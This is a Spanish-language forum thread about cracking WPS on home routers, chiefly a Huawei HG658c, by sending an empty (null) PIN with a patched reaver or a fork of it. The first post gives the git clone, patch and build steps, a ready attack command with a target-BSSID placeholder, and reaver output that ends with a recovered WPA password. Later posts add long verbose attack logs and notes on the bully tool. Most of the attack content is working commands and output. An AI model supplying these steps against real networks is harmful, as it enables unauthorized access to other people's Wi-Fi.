El libre pensamiento para un internet libre
No estas registrado.
- Temas: Activo | Sin respuesta
Anuncio
#1 30-03-2017 11:31:36
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 4,843
Crack WPS mandando un PIN "en blanco" (null)
Crack WPS sobre Huawei HG658c con un PIN en blanco
binarymaster del foro antichat.ru nos ha señalado un caso singular en esta "issue" de la rama Git Hub de reaver 1.5.3:
Habla de dos cosas:
- Los routeurs que emplean un PIN "no conforme" (que no respetan la regla del checksum WPS) .
Un caso que conocemos bien en España con los routers Amper ASL-26555 cuyo eSSID por defecto es de tipo WLAN_XXXX y con un inicio de bSSID en 8C:0C:A3.
- Cita también a un caso muy peculiar observado en un Huawei HG658c y nos dirige hacía este articulo:
Obtaining the WiFi password in a few seconds using WPS @ Fun with the Huawei HG658c
Veamos juntos que pasa con esto de "mandar un PIN vacío".
El articulo no está tremendamente documentado pero se sigue sin problemas el desarrolló de los eventos.
Algunas palabras sobre el HG658c... Es una box huawei muy parecida a... una box huawei. 
Se empela en irlanda, no se con que ISP, probablemente en otros lugares también.
Se ve en la etiqueta que no tiene PIN WPS (por lo menos no ponen ninguno)
La interfaz web de gestión del dispositivo es muy (demasiado) minimalista:
Hay un botón para activar y desactivar el WPS "de forma global" y luego podemos elegir entre PBC y PIN.
En este caso el router está en modo PBC
El autor del articulo (me parece que su nick es james Bond pero no lo tengo claro) empieza entonces un ataque de fuera bruta.
Aquí podéis ver el stdout (desgraciadamente sin el nivel máximo de "verbose")
[email protected]:~/reaver/new/src# reaver -i mon0 -c 6 -b 68:A0:F6:01:02:03 -v
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg
[+] Waiting for beacon from 68:A0:F6:01:02:03
[+] Associated with 68:A0:F6:01:02:03 (ESSID: vodafone-XXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Pin count advanced: 3. Max pin attempts: 11000
[+] Trying pin 11115670.
[+] Pin count advanced: 4. Max pin attempts: 11000
[+] Trying pin 22225672.
[+] Pin count advanced: 5. Max pin attempts: 11000
[+] Trying pin 33335674.
[+] Pin count advanced: 6. Max pin attempts: 11000
[+] 0.05% complete. Elapsed time: 0d0h0m16s.
[+] Trying pin 44445676.
[+] Pin count advanced: 7. Max pin attempts: 11000
[+] Trying pin 55555678.
[+] Pin count advanced: 8. Max pin attempts: 11000
[+] Trying pin 66665670.
[+] Pin count advanced: 9. Max pin attempts: 11000
[+] Trying pin 77775672.
[+] Pin count advanced: 10. Max pin attempts: 11000
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^C
[+] Session saved. El ataque adelanta hasta llegar a provocar un bloqueo del WPS.
Diez PIN fueron comprobados: El WPS en modo PIN está habilitado.
Esto ha despertado la curiosidad del amigo James Bond (o como se llame)
Se ha conectado en los puertos SERIAL del punto de acceso para iniciar una sesión con interprete de ordenes ATP.
Connected to 192.168.1.1.
Escape character is '^]'.
-------------------------------
-----Welcome to ATP Cli------
-------------------------------
Login: !!Huawei
Password:
ATP>sh
BusyBox vv1.9.1 (2014-02-08 20:26:13 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.Ha podido comprobar el valor atribuido al PIN WPS.
# nvram show | grep wps_device_pin
size: 2659 bytes (30109 left)
wps_device_pin= Podéis ver que no está definido ningún valor.
Un PIN "en blanco", su valor es "NULL".
El WPS en modo PIN está habilitado pero el PIN no está definido.
Entonces ha modificado reaver para poder probar con un PIN vacío con un patch.
El PIN se manda vació se manda con la opción nueva ( -B )
[email protected]:~/reaver# git clone https://github.com/t6x/reaver-wps-fork-t6x.git reaver
[email protected]:~/reaver# cd reaver
[email protected]:~/reaver/reaver# patch -p1 < ../emptystringpin.diff
[email protected]:~/reaver/reaver# cd src/
[email protected]:~/reaver/reaver/src# ./configure ; make
[email protected]:~/reaver/reaver/src# ./reaver -i mon0 -c 6 -b 68:A0:F6:01:02:03 -v -B
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg
[+] Waiting for beacon from 68:A0:F6:01:02:03
[+] Associated with 68:A0:F6:01:02:03 (ESSID: vodafone-XXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] WPS PIN: '12345670'
[+] WPA PSK: 'SuperSecretWifiPassword'
[+] AP SSID: 'vodafone-XXXX'No es muy calro porque no ha modificado la salida de reaver
Lo que hace el patch es que sobrescribe el PIN 12345670 con un una cadena vacía.
El PIN mandado no tiene valor definido y el routeur.... devuelve la llave. 
Es un caso muy interesante: Muchas interfaces WPS requieren que se define un PIN además de habilitar el WPS.
Es muy posible toparnos con un router con el WPS habilitado y sin PIN definido.
O porque el usuario lo ha dejado así o porque viene así de fabrica.
He pensado enseguida en los routers jazztell de ZTE.
Ya sabéis, tienen el WPS un poco raro, está deshabilitado sin ser deshabilitado del todo.
He probado y no ha dado resultados.
Hace falta hacer más pruebas sobre routers configurados con el WPS habilitado sin PIN definido.
Para ver si es un método que podemos aplicar de forma general o si funciona solo con ciertos chipsets/firmware/dispositivos.
Es en todos casos una vía nueva a explorar. 
Si queréis hacer pruebas les recomiendo usar la modificación de binarymaster en lugar del patch propuesto en el blog.
La podéis instalar así:
git clone https://github.com/binarymaster/reaver-wps-fork-t6x.git cd reaver-wps-fork-t6x cd src ./configure make sudo make installPara hacer el ataque con PIN vació debéis emplear el argumento -X
Aconsejo añadir el ataque -n por sí las moscas.
Algo así:
sudo reaver -i <interfaz> -b <bssid_objetivo> -c <canal> -X -n -vvvAsí solo vale para probar un PIN vacío.
Si no le sale debéis parrar el ataque y iniciar otro sin la opción -X en caso de que queréis seguir un ataque de fuerza bruta convencional.
Desconectado
Anuncio
#2 30-03-2017 11:48:49
- Koala
- Very Important Usuario
- Registrado: 11-09-2016
- Mensajes: 798
Re: Crack WPS mandando un PIN "en blanco" (null)
Por defecto esta el WPS activado con el PBC ?
Hay cosas que no entiendo.. desde tiempo ahora se sabe que el WPS tiene vulnaribilidad y lo dejan activado.. cuanto redes en espana tienen el wps activado por defecto tambien ?
Desconectado
#3 30-03-2017 12:21:35
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 4,843
Re: Crack WPS mandando un PIN "en blanco" (null)
Por defecto esta el WPS activado con el PBC ? big_smile
Exacto.
El WPS habilitado con el modo PBC y el modo PIN
Lo que pasa es que no definen un PIN.
Dejando así el WPS en modo PIN "entre dos aguas"
Hay cosas que no entiendo.. desde tiempo ahora se sabe que el WPS tiene vulnaribilidad y lo dejan activado.. cuanto redes en espana tienen el wps activado por defecto tambien ?
Muchas. Por no decir casi todas.
Hay que decir también que casí todas tienen bloqueo del WPS
Pero siguen dejando la posibilidad de encontrar un algoritmo, un PIN genérico o una brecha nueva y de poder explotarla.
El único ISP que ha realmente hecho algo al respecto de forma radical es jazztell
Han "roto" el WPS en modo PIN con un update generalizado del firmware de sus routers.
Las otras tele-operadoras se limitan a tener el bloqueo del WPS activado.
Desconectado
#4 30-03-2017 17:50:57
- Patcher
- waircut
- Registrado: 14-01-2016
- Mensajes: 592
Re: Crack WPS mandando un PIN "en blanco" (null)
Tenia pendiente consultarte esto por que también a mi me lo han reportado desde antichat.ru para que lo implemente en waircut. No estaba seguro de si era una trolada, veo que no, por lo que lo pondré también en waircut.
Desconectado
#5 30-03-2017 21:01:18
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 4,843
Re: Crack WPS mandando un PIN "en blanco" (null)
No creo que sea una trolada... Esto sí: Falta documentación y tampoco te lo puedo asegurar...
He mirrado las otras entradas en este blog y se ve que hay un trabajo serio sobre este router.
Molaría mucho tener un routeur que se podría dejar con el PIN no configurado... He mirrado en unos cuantos y no podía.
He intentado con el PIN "GIVEkey" también
No funcionó... 
Les dejo aquí el stdout hecho desde el foro antichat:
[email protected]:~# ./reaver -i wlan0mon -b D4:76:EA:хх:хх:хх -c 6 -v -N -B "" -vvv
Reaver v1.5.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft
[+] Switching wlan0mon to channel 6
[?] Restore previous session for D4:76:EA:хх:хх:хх? [n/Y] n
[+] Waiting for beacon from D4:76:EA:хх:хх:хх
[+] Associated with D4:76:EA:хх:хх:хх (ESSID: ROSTELECOM-хх)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 8 seconds
[+] WPS PIN: ''
[+] Nothing done, nothing to save.Y otro hecho en modo "--debug"
[email protected]:~/reaver/src# ./reaver -i wlan0mon -b D4:76:EA:xx:xx:xx -c 6 -vvv -p "" -N
Reaver v1.5.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft
[+] Switching wlan0mon to channel 6
[+] Waiting for beacon from D4:76:EA:xx:xx:xx
[+] Associated with D4:76:EA:xx:xx:xx (ESSID: ROSTELECOM-xx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=0):
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin ""
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
WPS: Processing received message (len=539 op_code=4)
WPS: Received WSC_MSG
WPS: attr type=0x104a len=1
.................................
[+] Received M5 message
WPS: Processing received message (len=158 op_code=4)
WPS: Received WSC_MSG
WPS: attr type=0x104a len=1
WPS: attr type=0x1022 len=1
WPS: attr type=0x1039 len=16
WPS: attr type=0x1018 len=112
WPS: attr type=0x1005 len=8
WPS: Parsed WSC_MSG
WPS: Received M7
WPS: Unexpected state (12) for receiving M7
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M7 message
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
[+] Pin cracked in 15 seconds
[+] WPS PIN: ''
[+] Nothing done, nothing to save.
WPS: Full PIN information revealed and negotiation failed
WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 41 44 53 4c 20 4dAl final el PIIN en blanco está crackeado pero no permite obtener la llave.
Desgraciadamente no da los detalles sobre su router y su configuración.
ver: Уязвимость в протоколе Wi-Fi Protected Setup
Desconectado
#6 03-10-2017 10:25:35
- d1k0w0ns
- Expulsado
- Registrado: 12-06-2015
- Mensajes: 374
Re: Crack WPS mandando un PIN "en blanco" (null)
bully no cuela con el (PIN NULL), lo cambia secuencialmente a 00000000
y sin usar la opcion -S pero se la toma como default aunque no este activada como default, linux es magico,
[!] Starting pin specified, defaulting to sequential mode
[+] Index of starting pin number is '0000000'
Desconectado
Anuncio
Temas similares
| Tema | Respuestas | Vistas | Ultimo mensaje |
|---|---|---|---|
|
Pegado: |
328 | 22698 | Ayer 21:49:21 por v1s1t0r |
|
Pegado: |
14 | 317 | Ayer 16:57:13 por josep345 |
| 5 | 489 | 24-05-2019 22:04:42 por mooooon | |
| 3 | 193 | 21-05-2019 16:08:16 por kcdtv | |
|
Evitar bloqueo router con Bully por KlaS88
|
1 | 217 | 21-05-2019 16:01:45 por kcdtv |
Información del usuario
Ultimo usuario registrado: CreMaTLVctm
Usuarios registrados conectados: 0
Invitados conectados: 10
Estadisticas de los foros
Número total de usuarios registrados: 1,503
Número total de temas: 1,320
Número total de mensajes: 13,404
Atom tema feed - Impulsado por FluxBB
© 2014-2018 Wifi-libre.com - [ Generated in 0.037 seconds ]